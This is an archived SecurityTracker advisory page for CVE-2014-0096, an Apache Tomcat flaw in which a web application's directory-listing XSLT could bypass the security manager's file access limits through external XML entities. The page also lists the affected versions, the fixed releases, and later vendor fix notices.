SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Apache Tomcat Vendors:   Apache Software Foundation
Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
SecurityTracker Alert ID:  1030301
SecurityTracker URL:  http://securitytracker.com/id/1030301
CVE Reference:   CVE-2014-0096   (Links to External Site)
Date:  May 27 2014
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 6.0.0 to 6.0.39, 7.0.0 to 7.0.52, 8.0.0-RC1 to 8.0.3
Description:   A vulnerability was reported in Apache Tomcat. A remote authenticated user can bypass file access constraints in certain situations.

A web application running under a security manager can define an XSLT to bypass file access constraints.

The Tomcat security team reported this vulnerability.

Impact:   A remote authenticated user can bypass file access constraints in certain situations.
Solution:   The vendor has issued a fix (6.0.41, 7.0.53, 8.0.5).

The vendor's advisory is available at:

http://tomcat.apache.org/security-8.html

Vendor URL:  tomcat.apache.org/security-8.html (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 4 2014 (Red Hat Issues Fix for JBoss) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
Red Hat has issued a fix for JBoss.
May 18 2015 (IBM Issues Fix for IBM Power Hardware Management Console) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
IBM has issued a fix for IBM Power Hardware Management Console.
Jul 30 2015 (Blue Coat Systems Issues Advisory for Blue Coat IntelligenceCenter) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
Blue Coat Systems has issued an advisory for Blue Coat IntelligenceCenter 3.2 and 3.3.
Oct 16 2015 (HP Issues Fix for HP OpenVMS) Apache Tomcat Security Manager Bug Lets Remote Authenticated Users Bypass Security Controls and View Files
HP has issued a fix for HP OpenVMS.



 Source Message Contents

Subject:  [FD] [SECURITY] CVE-2014-0096 Apache Tomcat information disclosure

CVE-2014-0096 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The default servlet allows web applications to define (at multiple
levels) an XSLT to be used to format a directory listing. When running
under a security manager, the processing of these was not subject to the
same constraints as the web application. This enabled a malicious web
application to bypass the file access constraints imposed by the
security manager via the use of external XML entities.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC